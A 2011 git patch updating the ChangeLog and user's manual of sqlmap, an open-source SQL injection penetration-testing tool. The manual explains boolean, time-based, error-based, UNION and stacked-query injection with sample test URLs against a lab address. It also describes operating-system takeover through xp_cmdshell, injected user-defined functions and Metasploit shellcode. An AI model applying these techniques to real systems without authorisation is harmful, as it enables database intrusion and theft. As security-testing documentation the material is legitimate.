From b47d3e1da3a0a61e23bcd83c9710af13edea931d Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 27 Feb 2011 12:19:32 +0000
Subject: [PATCH] Huge update to user's manual. A lot to be done yet.

---
 doc/ChangeLog   |   30 +-
 doc/README.html | 6213 +++++++++++------------------------------------
 doc/README.pdf  |  Bin 451418 -> 371657 bytes
 doc/README.sgml | 4304 ++++++--------------------------
 4 files changed, 2147 insertions(+), 8400 deletions(-)

diff --git a/doc/ChangeLog b/doc/ChangeLog
index 8be5c981b..1a3cb438d 100644
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@@ -1,37 +1,47 @@
 sqlmap (0.9-1) stable; urgency=low
 
+  * Rewritten SQL injection detection engine (Bernardo and Miroslav).
   * Support to directly connect to the database without passing via a
     SQL injection, -d switch (Bernardo and Miroslav).
+  * Added full support for both time-based blind SQL injection and
+    error-based SQL injection techniques (Bernardo and Miroslav).
   * Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
-  * Initial support for Firebird, Sybase and SAP MaxDB (Miroslav).
+  * Implemented support for Firebird (Bernardo and Miroslav).
+  * Implemented support for Microsoft Access, Sybase and SAP MaxDB
+    (Miroslav).
   * Extended old '--dump -C' functionality to be able to search for
     specific database(s), table(s) and column(s), --search switch
     (Bernardo).
   * Added support to tamper injection data with --tamper switch (Bernardo
     and Miroslav).
+  * Added automatic recognition of password hashes format and support to
+    crack them with a dictionary-based attack (Miroslav).
   * Added support to enumerate roles on Oracle, --roles switch (Bernardo).
   * Added support for SOAP based web services requests (Bernardo).
   * Added support to fetch unicode data (Bernardo and Miroslav).
   * Added support to use persistent HTTP(s) connection for speed
     improvement, --keep-alive switch (Miroslav).
-  * Implemented HTTP proxy authentication support, --proxy-cred switch
+  * Support to test and inject against HTTP Referer header (Miroslav).
+  * Implemented HTTP(s) proxy authentication support, --proxy-cred switch
     (Miroslav).
   * Implemented feature to speedup the enumeration of table names
     (Miroslav).
-  * Support for customizable HTTP redirections (Bernardo).
+  * Support for customizable HTTP(s) redirections (Bernardo).
   * Support to replicate the back-end DBMS tables structure and entries
     in a local SQLite 3 database, --replicate switch (Miroslav).
   * Support to parse and test forms on target url, --forms switch
-    (Miroslav).
-  * Added switches to brute-force table names with a dictionary attack,
-    --common-exists and --exists. Useful for instance when system table
-    'information_schema' is not available on MySQL (Miroslav).
+    (Bernardo and Miroslav).
+  * Added switches to brute-force tables names and columns names with a
+    dictionary attack, --common-tables and --common-columns. Useful for
+    instance when system table 'information_schema' is not available on
+    MySQL (Miroslav).
   * Basic support for REST-style URL parameters by using the asterisk (*)
     to mark where to test for and exploit SQL injection (Miroslav).
   * Added safe URL feature, --safe-url and --safe-freq (Miroslav).
-  * Added --text-only switch to strip from the HTTP body the HTML/JS code
-    and compare pages based only on their textual content (Miroslav).
-  * Several bugs fixed (Bernardo and Miroslav).
+  * Added --text-only switch to strip from the HTTP response body the
+    HTML/JS code and compare pages based only on their textual content
+    (Miroslav).
+  * Over 100 bugs fixed (Bernardo and Miroslav).
   * Major code refactoring (Bernardo and Miroslav).
   * User's manual updated (Bernardo).
 
diff --git a/doc/README.html b/doc/README.html
index be969823d..ae8ab131e 100644
--- a/doc/README.html
+++ b/doc/README.html
@@ -1,7 +1,7 @@
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
 <HTML>
 <HEAD>
- <META NAME="GENERATOR" CONTENT="LinuxDoc-Tools 0.9.65">
+ <META NAME="GENERATOR" CONTENT="LinuxDoc-Tools 0.9.66">
  <TITLE>sqlmap user's manual</TITLE>
 </HEAD>
 <BODY>
@@ -9,13 +9,10 @@
 
 <H2>by 
 <A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A>, 
-<A HREF="mailto:miroslav.stampar@gmail.com">Miroslav Stampar</A></H2>version 0.8, March 14, 2010
+<A HREF="mailto:miroslav.stampar@gmail.com">Miroslav Stampar</A></H2>version 0.9, March 10, 2011
 <HR>
 <EM>This document is the user's manual to use 
-<A HREF="http://sqlmap.sourceforge.net">sqlmap</A>.
-Check the project 
-<A HREF="http://sqlmap.sourceforge.net">homepage</A>
-for the latest version.</EM>
+<A HREF="http://sqlmap.sourceforge.net">sqlmap</A>.</EM>
 <HR>
 <P>
 <H2><A NAME="toc1">1.</A> <A HREF="README.html#s1">Introduction</A></H2>
@@ -25,7 +22,6 @@ for the latest version.</EM>
 <LI><A NAME="toc1.2">1.2</A> <A HREF="README.html#ss1.2">Scenario</A>
 <LI><A NAME="toc1.3">1.3</A> <A HREF="README.html#ss1.3">Techniques</A>
 <LI><A NAME="toc1.4">1.4</A> <A HREF="README.html#ss1.4">Demo</A>
-<LI><A NAME="toc1.5">1.5</A> <A HREF="README.html#ss1.5">History</A>
 </UL>
 <P>
 <H2><A NAME="toc2">2.</A> <A HREF="README.html#s2">Features</A></H2>
@@ -36,10 +32,18 @@ for the latest version.</EM>
 <LI><A NAME="toc2.3">2.3</A> <A HREF="README.html#ss2.3">Takeover features</A>
 </UL>
 <P>
-<H2><A NAME="toc3">3.</A> <A HREF="README.html#s3">Download and update</A></H2>
+<H2><A NAME="toc3">3.</A> <A HREF="README.html#s3">History</A></H2>
 
+<UL>
+<LI><A NAME="toc3.1">3.1</A> <A HREF="README.html#ss3.1">2011</A>
+<LI><A NAME="toc3.2">3.2</A> <A HREF="README.html#ss3.2">2010</A>
+<LI><A NAME="toc3.3">3.3</A> <A HREF="README.html#ss3.3">2009</A>
+<LI><A NAME="toc3.4">3.4</A> <A HREF="README.html#ss3.4">2008</A>
+<LI><A NAME="toc3.5">3.5</A> <A HREF="README.html#ss3.5">2007</A>
+<LI><A NAME="toc3.6">3.6</A> <A HREF="README.html#ss3.6">2006</A>
+</UL>
 <P>
-<H2><A NAME="toc4">4.</A> <A HREF="README.html#s4">License and copyright</A></H2>
+<H2><A NAME="toc4">4.</A> <A HREF="README.html#s4">Download and update</A></H2>
 
 <P>
 <H2><A NAME="toc5">5.</A> <A HREF="README.html#s5">Usage</A></H2>
@@ -48,21 +52,28 @@ for the latest version.</EM>
 <LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Output verbosity</A>
 <LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Target</A>
 <LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Request</A>
-<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Injection</A>
-<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Techniques</A>
-<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Fingerprint</A>
-<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Enumeration</A>
-<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">User-defined function injection</A>
-<LI><A NAME="toc5.9">5.9</A> <A HREF="README.html#ss5.9">File system access</A>
-<LI><A NAME="toc5.10">5.10</A> <A HREF="README.html#ss5.10">Operating system access</A>
-<LI><A NAME="toc5.11">5.11</A> <A HREF="README.html#ss5.11">Windows registry access</A>
-<LI><A NAME="toc5.12">5.12</A> <A HREF="README.html#ss5.12">Miscellaneous</A>
+<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Optimization</A>
+<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Injection</A>
+<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Detection</A>
+<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Techniques</A>
+<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Fingerprint</A>
+<LI><A NAME="toc5.9">5.9</A> <A HREF="README.html#ss5.9">Enumeration</A>
+<LI><A NAME="toc5.10">5.10</A> <A HREF="README.html#ss5.10">Brute force</A>
+<LI><A NAME="toc5.11">5.11</A> <A HREF="README.html#ss5.11">User-defined function injection</A>
+<LI><A NAME="toc5.12">5.12</A> <A HREF="README.html#ss5.12">File system access</A>
+<LI><A NAME="toc5.13">5.13</A> <A HREF="README.html#ss5.13">Operating system takeover</A>
+<LI><A NAME="toc5.14">5.14</A> <A HREF="README.html#ss5.14">Windows registry access</A>
+<LI><A NAME="toc5.15">5.15</A> <A HREF="README.html#ss5.15">General</A>
+<LI><A NAME="toc5.16">5.16</A> <A HREF="README.html#ss5.16">Miscellaneous</A>
 </UL>
 <P>
-<H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">Disclaimer</A></H2>
+<H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">License and copyright</A></H2>
 
 <P>
-<H2><A NAME="toc7">7.</A> <A HREF="README.html#s7">Authors</A></H2>
+<H2><A NAME="toc7">7.</A> <A HREF="README.html#s7">Disclaimer</A></H2>
+
+<P>
+<H2><A NAME="toc8">8.</A> <A HREF="README.html#s8">Authors</A></H2>
 
 
 <HR>
@@ -70,11 +81,11 @@ for the latest version.</EM>
 
 <P>sqlmap is an open source penetration testing tool that automates the
 process of detecting and exploiting SQL injection flaws and taking over of
-back-end database servers.
-It comes with a broad range of features lasting from database
-fingerprinting, over data fetching from the database, to accessing the
-underlying file system and executing commands on the operating system via
-out-of-band connections.</P>
+database servers. It comes with a kick-ass detection engine, many niche
+features for the ultimate penetration tester and a broad range of switches
+lasting from database fingerprinting, over data fetching from the
+database, to accessing the underlying file system and executing commands
+on the operating system via out-of-band connections.</P>
 
 
 <H2><A NAME="ss1.1">1.1</A> <A HREF="#toc1.1">Requirements</A>
@@ -84,7 +95,7 @@ out-of-band connections.</P>
 <A HREF="http://www.python.org">Python</A>,
 a dynamic object-oriented interpreted programming language.
 This makes the tool independent from the operating system. It only
-requires the Python interpreter version equal or above to <B>2.5</B>.
+requires the Python interpreter version equal or higher than <B>2.6</B>.
 The interpreter is freely downloadable from its
 <A HREF="http://python.org/download/">official site</A>.
 To make it even easier, many GNU/Linux distributions come out of the box
@@ -96,26 +107,54 @@ for x86, AMD64 and Itanium too.</P>
 <A HREF="http://metasploit.com/framework/">Metasploit Framework</A> for some of its post-exploitation takeover
 features. You need to grab a copy of it from the
 <A HREF="http://metasploit.com/framework/download/">download</A>
-page. The required version is <B>3.4</B> or above.</P>
+page - the required version is <B>3.5</B> or higher.
+For the ICMP tunneling out-of-band takeover technique, sqlmap requires
+<A HREF="http://corelabs.coresecurity.com/index.php?module=Wiki&amp;action=view&amp;type=tool&amp;name=Impacket">Impacket</A> library too.</P>
+<P>If you are willing to connect directly to a database server (<CODE>-d</CODE> switch), without passing
+via a web application, you need to install Python bindings for the database
+management system that you are going to attack:</P>
+<P>
+<UL>
+<LI>Firebird: 
+<A HREF="http://kinterbasdb.sourceforge.net/">python-kinterbasdb</A>.</LI>
+<LI>Microsoft Access: 
+<A HREF="http://pyodbc.googlecode.com/">python-pyodbc</A>.</LI>
+<LI>Microsoft SQL Server: 
+<A HREF="http://pymssql.sourceforge.net/">python-pymssql</A>.</LI>
+<LI>MySQL: 
+<A HREF="http://mysql-python.sourceforge.net/">python-mysqldb</A>.</LI>
+<LI>Oracle: 
+<A HREF="http://cx-oracle.sourceforge.net/">python cx_Oracle</A>.</LI>
+<LI>PostgreSQL: 
+<A HREF="http://initd.org/psycopg/">python-psycopg2</A>.</LI>
+<LI>SQLite: 
+<A HREF="http://pysqlite.googlecode.com/">python-pysqlite2</A>.</LI>
+<LI>Sybase: 
+<A HREF="http://pymssql.sourceforge.net/">python-pymssql</A>.</LI>
+</UL>
+</P>
 <P>If you plan to attack a web application behind NTLM authentication or use
-the sqlmap update functionality you need to install respectively
-<A HREF="http://code.google.com/p/python-ntlm/">python-ntlm</A>
-and 
+the sqlmap update functionality (<CODE>-</CODE><CODE>-update</CODE> switch) you need to
+install respectively 
+<A HREF="http://code.google.com/p/python-ntlm/">python-ntlm</A> and 
 <A HREF="http://pysvn.tigris.org/">python-svn</A> libraries.</P>
 <P>Optionally, if you are running sqlmap on Windows, you may wish to install
 <A HREF="http://ipython.scipy.org/moin/PyReadline/Intro">PyReadline</A>
 library to be able to take advantage of the sqlmap TAB completion and
-history support functionalities in the SQL shell and OS shell.
+history support features in the SQL shell and OS shell.
 Note that these functionalities are available natively by Python standard
 <A HREF="http://docs.python.org/library/readline.html">readline</A>
 library on other operating systems.</P>
 <P>You can also choose to install 
-<A HREF="http://psyco.sourceforge.net/">Psyco</A> library to speed up the sqlmap algorithmic operations.</P>
+<A HREF="http://psyco.sourceforge.net/">Psyco</A> library to eventually speed up the sqlmap algorithmic
+operations.</P>
 
 
 <H2><A NAME="ss1.2">1.2</A> <A HREF="#toc1.2">Scenario</A>
 </H2>
 
+<H3>Detect and exploit a SQL injection</H3>
+
 <P>Let's say that you are auditing a web application and found a web page
 that accepts dynamic user-provided values on <CODE>GET</CODE> or <CODE>POST</CODE>
 parameters or HTTP <CODE>Cookie</CODE> values or HTTP <CODE>User-Agent</CODE>
@@ -123,30 +162,31 @@ header value.
 You now want to test if these are affected by a SQL injection
 vulnerability, and if so, exploit them to retrieve as much information as
 possible out of the web application's back-end database management system
-or even be able to access the underlying operating system.</P>
-<P>Consider that the target url is:</P>
+or even be able to access the underlying file system and operating system.</P>
+<P>In a simple world, consider that the target url is:</P>
 <P>
 <BLOCKQUOTE><CODE>
-<CODE>http://172.16.213.131/sqlmap/mysql/get_int.php?id=1</CODE>
+<CODE>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1</CODE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>Assume that:</P>
 <P>
 <BLOCKQUOTE><CODE>
-<CODE>http://172.16.213.131/sqlmap/mysql/get_int.php?id=1+AND+1=1</CODE>
+<CODE>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1</CODE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>is the same page as the original one and:</P>
 <P>
 <BLOCKQUOTE><CODE>
-<CODE>http://172.16.213.131/sqlmap/mysql/get_int.php?id=1+AND+1=2</CODE>
+<CODE>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2</CODE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>differs from the original one, it means that you are in front of a SQL
 injection vulnerability in the <CODE>id</CODE> <CODE>GET</CODE> parameter of the
-<CODE>index.php</CODE> web application page which means that no IDS/IPS, no
-web application firewall, no parameters' value sanitization is performed
-on the server-side.</P>
+<CODE>index.php</CODE> web application page which means that potentially no
+IDS/IPS, no web application firewall, no parameters' value sanitization is
+performed on the server-side before sending the SQL statement to the
+back-end database management system the web application relies on.</P>
 <P>This is a quite common flaw in dynamic content web applications and it
 does not depend upon the back-end database management system nor on the web
 application programming language: it is a programmer code's security flaw.
@@ -154,7 +194,7 @@ The
 <A HREF="http://www.owasp.org">Open Web Application Security Project</A>
 rated on 2010 in their 
 <A HREF="http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">OWASP Top Ten</A> survey this vulnerability as the 
-<A HREF="http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf">most common</A> and important web application vulnerability along with other
+<A HREF="http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202010.pdf">most common</A> and important web application vulnerability along with other
 injection flaws.</P>
 <P>Back to the scenario, probably the SQL <CODE>SELECT</CODE> statement into
 <CODE>get_int.php</CODE> has a syntax similar to the following SQL query, in
@@ -169,7 +209,9 @@ a value for <CODE>id</CODE> such condition will take place when the web
 application passes the query to the back-end database management system
 that executes it, that is why the condition <CODE>id=1 AND 1=1</CODE> is valid
 (<EM>True</EM>) and returns the same page as the original one, with the
-same content and without showing any SQL error message.</P>
+same content. This is the case of a boolean-based blind SQL injection
+vulnerability. However, sqlmap is able to detect any type of SQL injection
+and adapt its work-flow accordingly. Read below for further details.</P>
 <P>Moreover, in this simple and easy to inject scenario it would be also
 possible to append, not just one or more valid SQL condition(s), but also
 stacked SQL queries, for instance something like <CODE>[...]&amp;id=1;
@@ -180,57 +222,82 @@ exploit it by manipulating the <CODE>id</CODE> parameter value in the HTTP
 request.</P>
 <P>There exist many 
 <A HREF="http://delicious.com/inquis/sqlinjection">resources</A>
-on the Net explaining in depth how to prevent, how to detect and how to
-exploit SQL injection vulnerabilities in web application and it is
-recommended to read them if you are not familiar with the issue before
-going ahead with sqlmap.</P>
-<P>Passing the original address, <CODE>http://172.16.213.131/sqlmap/mysql/get_int.php?id=1</CODE>
+on the Net explaining in depth how to prevent, detect and exploit SQL
+injection vulnerabilities in web application and it is recommended to read
+them if you are not familiar with the issue before going ahead with sqlmap.</P>
+<P>Passing the original address, <CODE>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1</CODE>
 to sqlmap, the tool will automatically:</P>
 <P>
 <UL>
-<LI>Identify the vulnerable parameter(s) (<CODE>id</CODE> in this scenario);</LI>
-<LI>Depending on the user's options, fingerprint, enumerate, takeover
-the database server.</LI>
+<LI>Identify the vulnerable parameter(s) (<CODE>id</CODE> in this example);</LI>
+<LI>Identify which SQL injection techniques can be used to exploit the
+vulnerable parameter(s);</LI>
+<LI>Fingerprint the back-end database management system;</LI>
+<LI>Depending on the user's options, it will extensively fingerprint,
+enumerate data or takeover the database server as a whole.</LI>
 </UL>
 </P>
 
+<H3>Direct connection to the database management system</H3>
+
+<P>Up until sqlmap version <B>0.8</B>, the tool has been <EM>yet another
+SQL injection tool</EM>, used by web application penetration testers/newbies/curious
+teens/computer addicted/punks and so on. Things move on
+and as they evolve, we do as well. Now it supports this new switch,
+<CODE>-d</CODE>, that allows you to connect from your machine to the database
+server's TCP port where the database management system daemon is listening
+on and perform any operation you would do while using it to attack a
+database via a SQL injection vulnerability.</P>
+
 
 <H2><A NAME="ss1.3">1.3</A> <A HREF="#toc1.3">Techniques</A>
 </H2>
 
-<P>sqlmap implements three techniques to exploit a SQL injection
-vulnerability:</P>
+<P>sqlmap is able to detect and exploit five different SQL injection
+<EM>types</EM>:</P>
 <P>
 <UL>
-<LI><B>Inferential blind SQL injection</B>, also known as <B>boolean
-based blind SQL injection</B>: sqlmap appends to the affected parameter in
+<LI><B>Boolean-based blind SQL injection</B>, also known as <B>inferential
+SQL injection</B>: sqlmap replaces or appends to the affected parameter in
 the HTTP request, a syntatically valid SQL statement string containing a
 <CODE>SELECT</CODE> sub-statement, or any other SQL statement whose the user
 want to retrieve the output.
-For each HTTP response, by making a comparison based upon HTML page
-content hashes, or string matches, with the original request, the tool
-determines the output value of the statement character by character.
+For each HTTP response, by making a comparison between the HTTP response
+headers/body with the original request, the tool inference the output of
+the injected statement character by character. Alternatively, the user
+can provide a string or regular expression to match on True pages.
 The bisection algorithm implemented in sqlmap to perform this technique
-is able to fetch each output character with at maximum seven HTTP
-requests.
-This is sqlmap default SQL injection technique.</LI>
-<LI><B>UNION query (inband) SQL injection</B>, also known as <B>full
-UNION query SQL injection</B>: sqlmap appends to the affected parameter
-in the HTTP request, a syntatically valid SQL statement string starting
-with a <CODE>UNION ALL SELECT</CODE>. This techique is useful if the web
-application page passes the output of the <CODE>SELECT</CODE> statement to a
-<CODE>for</CODE> cycle, or similar, so that each line of the query output is
-printed on the page content.
+is able to fetch each character of the output with a maximum of seven HTTP
+requests. Where the output is not within the clear-text plain charset,
+sqlmap will adapt the algorithm with bigger ranges to detect the output.</LI>
+<LI><B>Time-based blind SQL injection</B>, also known as <B>full blind
+SQL injection</B>: sqlmap replaces or appends to the affected parameter in
+the HTTP request, a syntatically valid SQL statement string containing a
+query which put on hold the back-end DBMS to return for a certain number
+of seconds.
+For each HTTP response, by making a comparison between the HTTP response
+time with the original request, the tool inference the output of
+the injected statement character by character. Like for boolean-based
+technique, the bisection algorithm is applied.</LI>
+<LI><B>Error-based SQL injection</B>: sqlmap replaces or append to the
+affected parameter a database-specific syntatically wrong statement and
+parses the HTTP response headers and body in search of DBMS error messages
+containing the injected pre-defined chain of characters and the statement
+output within. This technique works when the web application has been
+configured to disclose back-end database management system error messages
+only.</LI>
+<LI><B>UNION query SQL injection</B>, also known as <B>inband SQL
+injection</B>: sqlmap appends to the affected parameter a syntatically
+valid SQL statement string starting with a <CODE>UNION ALL SELECT</CODE>.
+This techique works when the web application page passes the output of the
+<CODE>SELECT</CODE> statement within a <CODE>for</CODE> cycle, or similar, so that
+each line of the query output is printed on the page content.
 sqlmap is also able to exploit <B>partial (single entry) UNION query SQL
-injection</B> vulnerabilities which occur when the output of the statement
-is not cycled in a for construct whereas only the first entry output is
-displayed.
-This technique is much faster if the target url is affected by because
-in a single HTTP response it returns the whole query output or a entry
-per each response within the page content.
-This SQL injection technique is an alternative to the first one.</LI>
-<LI><B>Batched (stacked) queries support</B>, also known as <B>multiple
-statements support</B>: sqlmap tests if the web application supports
+injection</B> vulnerabilities which occur when the output of the
+statement is not cycled in a <CODE>for</CODE> construct whereas only the first
+entry of the query output is displayed.</LI>
+<LI><B>Stacked queries SQL injection</B>, also known as <B>multiple
+statements SQL injection</B>: sqlmap tests if the web application supports
 stacked queries then, in case it does support, it appends to the affected
 parameter in the HTTP request, a semi-colon (<CODE>;</CODE>) followed by the
 SQL statement to be executed. This technique is useful to run SQL
@@ -242,38 +309,296 @@ and the session user privileges.</LI>
 </UL>
 </P>
 
+
 <H2><A NAME="ss1.4">1.4</A> <A HREF="#toc1.4">Demo</A>
 </H2>
 
 <P>You can watch several demo videos, they are hosted on 
-<A HREF="http://www.youtube.com/user/inquisb#g/u">YouTube</A> and linked
-from 
-<A HREF="http://sqlmap.sourceforge.net/demo.html">here</A>.</P>
+<A HREF="http://www.youtube.com/user/inquisb#g/u">YouTube</A>.</P>
 
-<H2><A NAME="ss1.5">1.5</A> <A HREF="#toc1.5">History</A>
+
+<H2><A NAME="s2">2.</A> <A HREF="#toc2">Features</A></H2>
+
+<P>Features implemented in sqlmap include:</P>
+
+
+<H2><A NAME="ss2.1">2.1</A> <A HREF="#toc2.1">Generic features</A>
 </H2>
 
-<H3>2010</H3>
-
 <P>
 <UL>
+<LI>Full support for <B>MySQL</B>, <B>Oracle</B>, <B>PostgreSQL</B>,
+<B>Microsoft SQL Server</B>, <B>Microsoft Access</B>, <B>SQLite</B>,
+<B>Firebird</B>, <B>Sybase</B> and <B>SAP MaxDB</B> database
+management systems.
+</LI>
+<LI>Full support for five SQL injection techniques: <B>boolean-based
+blind</B>, <B>time-based blind</B>, <B>error-based</B>,
+<B>UNION query</B> and <B>stacked queries</B>.
+</LI>
+<LI>Support to <B>directly connect to the database</B> without passing
+via a SQL injection, by providing DBMS credentials, IP address, port and
+database name.
+</LI>
+<LI>It is possible to provide a single target URL, get the list of
+targets from 
+<A HREF="http://portswigger.net/suite/">Burp proxy</A>
+or 
+<A HREF="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab proxy</A> requests log files, get the whole HTTP request
+from a text file or get the list of targets by providing sqlmap with a
+Google dork which queries 
+<A HREF="http://www.google.com">Google</A> search engine and parses its results page. You can also
+define a regular-expression based scope that is used to identify which of
+the parsed addresses to test.
+</LI>
+<LI>Tests provided <B>GET</B> parameters, <B>POST</B> parameters,
+HTTP <B>Cookie</B> header values, HTTP <B>User-Agent</B> header value
+and HTTP <B>Referer</B> header value to identify and exploit SQL
+injection vulnerabilities. It is also possible to specify a comma-separated
+list of specific parameter(s) to test.
+</LI>
+<LI>Option to specify the <B>maximum number of concurrent HTTP(S)
+requests (multi-threading)</B> to speed up the blind SQL injection
+techniques. It is also possible to specify the number of seconds to
+hold between each HTTP(S) request.
+</LI>
+<LI><B>HTTP <CODE>Cookie</CODE> header</B> string support, useful when the
+web application requires authentication based upon cookies and you have
+such data or in case you just want to test for and exploit SQL injection
+on such header values. You can also specify to always URL-encode the
+Cookie.
+</LI>
+<LI>Automatically handles <B>HTTP <CODE>Set-Cookie</CODE> header</B> from
+the application, re-establishing of the session if it expires. Test and
+exploit on these values is supported too. Vice versa, you can also force
+to ignore any <CODE>Set-Cookie</CODE> header.
+</LI>
+<LI>HTTP protocol <B>Basic, Digest, NTLM and Certificate
+authentications</B> support.
+</LI>
+<LI><B>HTTP(S) proxy</B> support to pass by the requests to the target
+application that works also with HTTPS requests and with authenticated
+proxy servers.
+</LI>
+<LI>Options to fake the <B>HTTP <CODE>Referer</CODE> header</B> value and
+the <B>HTTP <CODE>User-Agent</CODE> header</B> value specified by user or
+randomly selected from a textual file.
+</LI>
+<LI>Support to increase the <B>verbosity level of output messages</B>:
+there exist <B>seven levels</B> of verbosity.
+</LI>
+<LI>Support to <B>parse HTML forms</B> from the target URL and forge
+HTTP(S) requests against those pages to test the form parameters against
+vulnerabilities.
+</LI>
+<LI><B>Granularity and flexibility</B> in terms of both user's
+switches and features.
+</LI>
+<LI><B>Estimated time of arrival</B> support for each query, updated
+in real time, to provide the user with an overview on how long it will
+take to retrieve the queries' output.
+</LI>
+<LI>Automatically saves the session (queries and their output, even if
+partially retrieved) on a textual file in real time while fetching the
+data and <B>resumes the injection</B> by parsing the session file.
+</LI>
+<LI>Support to read options from a configuration INI file rather than
+specify each time all of the switches on the command line. Support also to
+generate a configuration file based on the command line switches provided.
+</LI>
+<LI>Support to <B>replicate the back-end database tables structure and
+entries</B> on a local SQLite 3 database.
+</LI>
+<LI>Option to update sqlmap to the latest development version from the
+subversion repository.
+</LI>
+<LI>Support to parse HTTP(S) responses and display any DBMS error
+message to the user.
+</LI>
+<LI>Integration with other IT security open source projects,
+<A HREF="http://metasploit.com/framework/">Metasploit</A> and 
+<A HREF="http://w3af.sourceforge.net/">w3af</A>.</LI>
+</UL>
+</P>
+
+
+<H2><A NAME="ss2.2">2.2</A> <A HREF="#toc2.2">Fingerprint and enumeration features</A>
+</H2>
+
+<P>
+<UL>
+<LI><B>Extensive back-end database software version and underlying
+operating system fingerprint</B> based upon
+<A HREF="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html">error messages</A>,
+<A HREF="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html">banner parsing</A>,
+<A HREF="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html">functions output comparison</A> and
+<A HREF="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html">specific features</A>
+such as MySQL comment injection. It is also possible to force the back-end
+database management system name if you already know it.
+</LI>
+<LI>Basic web server software and web application technology
+fingerprint.
+</LI>
+<LI>Support to retrieve the DBMS <B>banner</B>, <B>session user</B>
+and <B>current database</B> information. The tool can also check if the
+session user is a <B>database administrator</B> (DBA).
+</LI>
+<LI>Support to enumerate <B>database users</B>, <B>users' password
+hashes</B>, <B>users' privileges</B>, <B>users' roles</B>,
+<B>databases</B>, <B>tables</B> and <B>columns</B>.
+</LI>
+<LI>Automatic recognition of password hashes format and support to
+<B>crack them with a dictionary-based attack</B>.
+</LI>
+<LI>Support to <B>brute-force tables and columns name</B>. This is
+useful when the session user has no read access over the system table
+containing schema information or when the database management system does
+not store this information anywhere (e.g. MySQL &lt; 5.0).
+</LI>
+<LI>Support to <B>dump database tables</B> entirely, a range of
+entries or specific columns as per user's choice. The user can also choose
+to dump only a range of characters from each column's entry.
+</LI>
+<LI>Support to automatically <B>dump all databases</B>' schemas and
+entries. It is possibly to exclude from the dump the system databases.
+</LI>
+<LI>Support to <B>search for specific database names, specific tables
+across all databases or specific columns across all databases'
+tables</B>. This is useful, for instance, to identify tables containing
+custom application credentials where relevant columns' names contain
+string like <EM>name</EM> and <EM>pass</EM>.
+</LI>
+<LI>Support to <B>run custom SQL statement(s)</B> as in an interactive
+SQL client connecting to the back-end database. sqlmap automatically
+dissects the provided statement, determines which technique fits best to
+inject it and how to pack the SQL payload accordingly.</LI>
+</UL>
+</P>
+
+
+<H2><A NAME="ss2.3">2.3</A> <A HREF="#toc2.3">Takeover features</A>
+</H2>
+
+<P>Some of these techniques are detailed in the white paper
+<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A> and in the
+slide deck 
+<A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">Expanding the control over the operating system from the database</A>.</P>
+<P>
+<UL>
+<LI>Support to <B>inject custom user-defined functions</B>: the user
+can compile a shared library then use sqlmap to create within the back-end
+DBMS user-defined functions out of the compiled shared library file. These
+UDFs can then be executed, and optionally removed, via sqlmap. This is
+supported when the database software is MySQL or PostgreSQL.
+</LI>
+<LI>Support to <B>download and upload any file</B> from the database
+server underlying file system when the database software is MySQL,
+PostgreSQL or Microsoft SQL Server.
+</LI>
+<LI>Support to <B>execute arbitrary commands and retrieve their
+standard output</B> on the database server underlying operating system
+when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
+<UL>
+<LI>On MySQL and PostgreSQL via user-defined function injection and
+execution.</LI>
+<LI>On Microsoft SQL Server via <CODE>xp_cmdshell()</CODE> stored procedure.
+Also, the stored procedure is re-enabled if disabled or created from
+scratch if removed by the DBA.</LI>
+</UL>
+
+</LI>
+<LI>Support to <B>establish an out-of-band stateful TCP connection
+between the attacker machine and the database server</B> underlying
+operating system. This channel can be an interactive command prompt, a
+Meterpreter session or a graphical user interface (VNC) session as per
+user's choice.
+sqlmap relies on Metasploit to create the shellcode and implements four
+different techniques to execute it on the database server. These
+techniques are:
+<UL>
+<LI>Database <B>in-memory execution of the Metasploit's shellcode</B>
+via sqlmap own user-defined function <CODE>sys_bineval()</CODE>. Supported on
+MySQL and PostgreSQL.</LI>
+<LI>Upload and execution of a Metasploit's <B>stand-alone payload
+stager</B> via sqlmap own user-defined function <CODE>sys_exec()</CODE> on
+MySQL and PostgreSQL or via <CODE>xp_cmdshell()</CODE> on Microsoft SQL
+Server.</LI>
+<LI>Execution of Metasploit's shellcode by performing a <B>SMB
+reflection attack</B> (
